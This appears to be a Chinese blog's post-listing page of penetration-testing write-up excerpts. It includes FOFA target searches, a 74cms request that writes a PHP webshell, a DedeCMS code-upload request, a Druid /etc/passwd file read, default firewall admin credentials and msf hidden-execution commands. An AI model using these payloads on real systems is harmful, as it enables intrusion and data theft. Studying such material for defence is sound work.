自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(20)
  • 收藏
  • 关注

原创 灯塔的安装

准备。

2024-05-10 21:35:55 179

原创 使用python的selenium库进行对url进行批量访问和截图

这是使用python的selenium库进行对url的批量访问和截图。代码第一次写,也就处于勉强能跑,轻喷。

2023-07-11 15:25:46 810 1

原创 红日靶场二

目标主机所在的网络存在域环境,域名为de1ay.com,存在两台域主机WEB和PC,域控制器为DC.de1ay.com,主机名为DC,域管理员为Administrator。跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。发现有双网卡,10.10.10.1/24和192.168.239.2网段,域控IP 10.10.10.10。注意WEB的这台服务器,切换用户 de1ay,密码也是1qaz@WSX。

2023-03-28 19:52:31 558

原创 红日靶场五

总结现在的到的信息 有一个域sum,域内两台主机一台win7,一台dc,DC的ip为:192.168.138.138,win7双网卡:192.168.235.101、192.168.138.136。其中域控制器DC.sun.com,域管理员为Administrator。有上面信息收集可知域用户和域为用户可以填任意一个,域为sum.com。也可以用 shell whoami /user 获取sid。看到需要用户名,域和域sid,krbtgt的哈希。使用蚁剑连接之后我上传了冰蝎。thinkphp框架。

2023-03-28 19:50:46 200

原创 python实现的一个简单端口扫描器基于udp协议实现

UDP扫描发送空的(没有数据)UDP报头到每个目标端口。如果返回ICMP端口不可到达错误(类型3,代码3), 该端口是closed(关闭的)。其它ICMP不可到达错误(类型3, 代码1,2,9,10,或者13)表明该端口是filtered(被过滤的)。偶尔地,某服务会响应一个UDP报文,证明该端口是open(开放的)。使用方法...

2022-06-17 10:30:30 929

原创 网际互联及OSI七层模型和三次握手四次挥手

物理层、数据链路层、网络层、传输层、会话层、表示层、应用层先来复习下TCP报文首部首部的格式。1.源端口和目的端口(Source Port和Destination Port):分别占用2个字节,用于区别主机中的不同进程,而IP地址是用来区分不同的主机的,源端口号和目的端口号配合上IP首部中的源IP地址和目的IP地址就能唯一的确定一个TCP连接。2.序号seq(Sequence Number):占4个字节,用来标识从TCP发端向TCP收端发送的数据字节流(tcp传输的每一个字节都按顺序编号),它表示在这个报文

2022-06-09 22:27:06 236

原创 msf命令

常用命令总结execute执行文件execute #在目标机中执行文件execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"-d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行"-o hack.txt"是payload.exe的运行参数migrate进程迁移getpid # 获取当前进程的p...

2022-05-19 21:07:27 2097

原创 OWASP top10 漏洞

1.sql注入原理:SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来实现对数据库的任意操作。分类:1、报错注入2、bool 型注入3、延时注入4、宽字节注入防御:1.使用预编译语句,绑定变量2.使用存储过程3.使用安全函数4.检查数据类型​1.获取数据库名select SCHEMA_NAME from information_schema.SCHEMA.

2022-04-20 09:17:14 13445

原创 Apache Druid LoadData 任意文件读取漏洞

漏洞简介由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTPInputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。0x01 漏洞复现FOFA指纹:title="Apache Druid"1 在网站首页左上角点击Load data在点击在url处执行命令file:///etc/passwd0x02 漏洞POC和脚本

2022-04-11 12:16:14 179

原创 启明星辰 天清汉马USG防火墙(后台弱口令/任意用户权限)

fofa语句:title="天清汉马USG防火墙"默认账号密码账号:useradmin密码:venus.user到后台后,进入管理员页面修改访问权限,即可使用该用户

2022-04-11 12:14:19 7288

原创 泛微OA V8 SQL注入漏洞和文件上传漏洞

fofa语句app="泛微-协同办公OA"SQL注入在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds

2022-04-11 12:13:22 12499 1

原创 从致远OA-ajax.do未授权文件上传漏洞复现

打开网站任何测试它有没有未授权文件上传http://xxx/seeyon/thirdpartyController.do.css/…;/ajax.do通过抓取数据包,可以看到如下的数据请求和返回结构:返回状态404返回notfound然后直接poc这个jspx的马是在网上找到http://x.x.x.x/seeyon/autoinstall.do/..;/ajax.do?method=ajaxAction&managerName=formulaManage

2022-04-11 12:12:07 7377

原创 74cms

下载好源码php网站源码下载_php招聘网站源码_php网站模版_骑士cms人才系统然后安装,安装好之后发送poc:http://127.0.0.1/74cms//index.php?m=home&a=assign_resume_tplPOST: variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n

2022-04-11 12:10:55 1639

原创 DEDEC CMS v5.7 文件上传

首先我们要进入后台密码账号都是admin访问/dede/tpl.php?action=upload,审查源码,获取我们的token值。可以用taken值直接文件上传拿到token值后构造dede/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=c12bf4a8330732e9f45a492d54399803然后访问http:

2022-04-11 12:10:05 2190

原创 帝国CMS7.5漏洞复现

首先去它的后台http://127.0.0.1/upload/e/admin/index.php账号密码root依次 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据]抓包把tablename改为phpifno()注意这里只勾选一个就行了然后点击备份开始抓包将tablename改为phpifno然后放包看到这里就是刚刚的数据查看备份说明然后将文件目录下的config.php,将readme.txt改为config.php

2022-04-11 12:09:26 2370

原创 xss和csrf在dvwa中实现蠕虫攻击

验证csrf漏洞我们先在自己这里改密码然后看到上面有显示我们将上面的复制下来改为http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change#访问成功修改 测试一下成功验证xss漏洞有xss漏洞然后实现xss和csrf的蠕虫攻击在xss存储型那里写入<img src="h

2022-04-10 20:27:43 475

原创 SQL注入思维导图

SQL 危害 危害数据库里的数据 直接危害到网站的权限(需要满足条件) WEB源码 目录结构 后台目录 模板目录 数据库目录 数据库配置文件 ......... 脚本类型 ASP PHP ASPX JSP JAVAWEB Python .......... 应用分类 门户 电商 论坛 博客 第三方 其他

2022-04-10 20:25:20 1277

原创 HTTP请求(GET与POST区别)和响应

HTTP有两部分组成:请求与响应,下面分别整理。一.HTTP请求1.HTTP请求格式:<request line><headers><blank line>[<request-body>]在HTTP请求中,第一行必须是一个请求行(request line),用来说明请求类型、要访问的资源以及使用的HTTP版本。紧接着是一个首部(header)小节,用来说明服务器要使用的附加信息。在首部之后是一个空行,再此之后可以添加任意的其...

2022-04-10 20:19:16 897

原创 文件上传的一些简单绕过

文件上传过宝塔WAF0x00:写在前面0x01:上传绕过后缀检测的姿势方法1:文件名14.\np\nh\np绕过(如下0x02的方法1所示)方法2:0a污染就能传php了(改hex)0x02:绕过宝塔waf检测的文件内容书写方法1:文件名14.\np\nh\np绕过,用个deskop.ini做一下污染 写马。deskop.ini污染,就是类似windows dos窗口下制作图片🐎一样,二进制揉在一起。POST /sandbox/i9pkda6liup7jd81u

2022-04-10 20:16:54 1771

原创 phpmyadmin页面getshell

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法0x01 select into outfile直接写入1、利用条件对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值2、查看secure_file_priv值show global variables like '%secure%';关于secure_file_

2022-04-10 20:11:21 2365

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除